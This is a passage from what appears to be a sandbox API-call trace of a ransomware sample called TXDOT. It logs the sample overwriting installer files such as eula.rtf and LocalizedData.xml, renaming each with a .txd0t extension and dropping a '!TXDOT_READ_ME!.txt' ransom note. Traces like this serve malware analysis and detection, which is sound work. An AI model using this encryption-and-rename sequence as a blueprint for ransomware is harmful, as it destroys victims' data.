lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0xe70, lpOverlapped=0x0) returned 1 [0085.653] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffff190, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.653] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0xe70, lpOverlapped=0x0) returned 1 [0085.653] FlushFileBuffers (hFile=0x460) returned 1 [0085.656] GetProcessHeap () returned 0xe30000 [0085.656] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.656] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" [0085.656] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="eula.rtf" [0085.656] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.656] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\!TXDOT_READ_ME!.txt") returned 0 [0085.656] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1035\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0085.658] WriteFile (in: hFile=0x478, lpBuffer=0x53ef7c4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x53ef7c4*, lpNumberOfBytesWritten=0x53ef7c0*=0x2, lpOverlapped=0x0) returned 1 [0085.659] FlushFileBuffers (hFile=0x478) returned 1 [0085.661] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef7c0*=0x7f0, lpOverlapped=0x0) returned 1 [0085.662] FlushFileBuffers (hFile=0x478) returned 1 [0085.663] CloseHandle (hObject=0x478) returned 1 [0085.663] GetProcessHeap () returned 0xe30000 [0085.663] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.663] CloseHandle (hObject=0x460) returned 1 [0085.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t")) returned 1 [0085.664] SetEvent (hEvent=0x414) returned 1 [0085.664] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.664] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" [0085.664] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t" [0085.664] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t") returned 0 [0085.664] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.665] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0085.665] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=77022) returned 1 [0085.665] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.665] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.666] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffed122, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.666] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x12cd0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x12cd0, lpOverlapped=0x0) returned 1 [0085.668] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffed330, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.669] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x12cd0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x12cd0, lpOverlapped=0x0) returned 1 [0085.669] FlushFileBuffers (hFile=0x47c) returned 1 [0085.739] GetProcessHeap () returned 0xe30000 [0085.739] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe41328 [0085.739] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" [0085.739] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="LocalizedData.xml" [0085.739] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.739] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\!TXDOT_READ_ME!.txt") returned 1 [0085.739] GetProcessHeap () returned 0xe30000 [0085.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0085.739] CloseHandle (hObject=0x47c) returned 1 [0085.739] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.txd0t")) returned 1 [0085.740] SetEvent (hEvent=0x414) returned 1 [0085.740] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.744] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" [0085.745] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t" [0085.745] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t") returned 0 [0085.745] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.745] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0085.745] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=86442) returned 1 [0085.745] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.745] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.747] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffeac56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.747] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x151a0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x151a0, lpOverlapped=0x0) returned 1 [0085.750] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffeae60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.750] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x151a0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x151a0, lpOverlapped=0x0) returned 1 [0085.750] FlushFileBuffers (hFile=0x47c) returned 1 [0085.854] GetProcessHeap () returned 0xe30000 [0085.854] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.854] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" [0085.854] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="LocalizedData.xml" [0085.854] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.854] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\!TXDOT_READ_ME!.txt") returned 1 [0085.854] GetProcessHeap () returned 0xe30000 [0085.854] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.854] CloseHandle (hObject=0x47c) returned 1 [0085.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.txd0t")) returned 1 [0085.854] SetEvent (hEvent=0x414) returned 1 [0085.854] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.858] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" [0085.858] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t" [0085.858] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t") returned 0 [0085.858] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.858] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.858] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=12687) returned 1 [0085.859] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.859] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.864] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffcc71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.864] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x3180, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x3180, lpOverlapped=0x0) returned 1 [0085.873] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffce80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.873] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x3180, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x3180, lpOverlapped=0x0) returned 1 [0085.873] FlushFileBuffers (hFile=0x474) returned 1 [0085.880] GetProcessHeap () returned 0xe30000 [0085.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe41328 [0085.880] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" [0085.880] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="eula.rtf" [0085.880] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.880] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\!TXDOT_READ_ME!.txt") returned 0 [0085.880] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1042\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0085.887] WriteFile (in: hFile=0x464, lpBuffer=0x53ef7c4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x53ef7c4*, lpNumberOfBytesWritten=0x53ef7c0*=0x2, lpOverlapped=0x0) returned 1 [0085.888] FlushFileBuffers (hFile=0x464) returned 1 [0085.891] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef7c0*=0x7f0, lpOverlapped=0x0) returned 1 [0085.892] FlushFileBuffers (hFile=0x464) returned 1 [0085.895] CloseHandle (hObject=0x464) returned 1 [0085.895] GetProcessHeap () returned 0xe30000 [0085.895] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0085.896] CloseHandle (hObject=0x474) returned 1 [0085.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t")) returned 1 [0085.896] SetEvent (hEvent=0x414) returned 1 [0085.896] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.898] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" [0085.898] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t" [0085.898] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t") returned 0 [0085.899] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.905] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0085.905] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=79634) returned 1 [0085.905] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.905] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.907] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffec6ee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.907] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x13710, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x13710, lpOverlapped=0x0) returned 1 [0085.909] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffec8f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.909] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x13710, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x13710, lpOverlapped=0x0) returned 1 [0085.910] FlushFileBuffers (hFile=0x464) returned 1 [0086.098] GetProcessHeap () returned 0xe30000 [0086.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe41328 [0086.098] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" [0086.098] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="LocalizedData.xml" [0086.098] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.098] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\!TXDOT_READ_ME!.txt") returned 1 [0086.098] GetProcessHeap () returned 0xe30000 [0086.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0086.098] CloseHandle (hObject=0x464) returned 1 [0086.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.txd0t")) returned 1 [0086.099] SetEvent (hEvent=0x414) returned 1 [0086.099] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0086.100] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" [0086.100] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t" [0086.100] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t") returned 0 [0086.100] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.100] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0086.100] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=4040) returned 1 [0086.100] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.100] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0086.102] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffee38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.102] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xfc0, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0xfc0, lpOverlapped=0x0) returned 1 [0086.102] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffff040, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.102] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0xfc0, lpOverlapped=0x0) returned 1 [0086.102] FlushFileBuffers (hFile=0x464) returned 1 [0086.169] GetProcessHeap () returned 0xe30000 [0086.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe41328 [0086.169] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" [0086.169] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="eula.rtf" [0086.169] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.169] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\!TXDOT_READ_ME!.txt") returned 0 [0086.169] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1045\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0086.175] WriteFile (in: hFile=0x47c, lpBuffer=0x53ef7c4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x53ef7c4*, lpNumberOfBytesWritten=0x53ef7c0*=0x2, lpOverlapped=0x0) returned 1 [0086.176] FlushFileBuffers (hFile=0x47c) returned 1 [0086.179] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef7c0*=0x7f0, lpOverlapped=0x0) returned 1 [0086.180] FlushFileBuffers (hFile=0x47c) returned 1 [0086.183] CloseHandle (hObject=0x47c) returned 1 [0086.183] GetProcessHeap () returned 0xe30000 [0086.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0086.183] CloseHandle (hObject=0x464) returned 1 [0086.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t")) returned 1 [0086.183] SetEvent (hEvent=0x414) returned 1 [0086.183] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0086.189] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" [0086.190] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t" [0086.190] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t") returned 0 [0086.190] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.190] CreateFileW 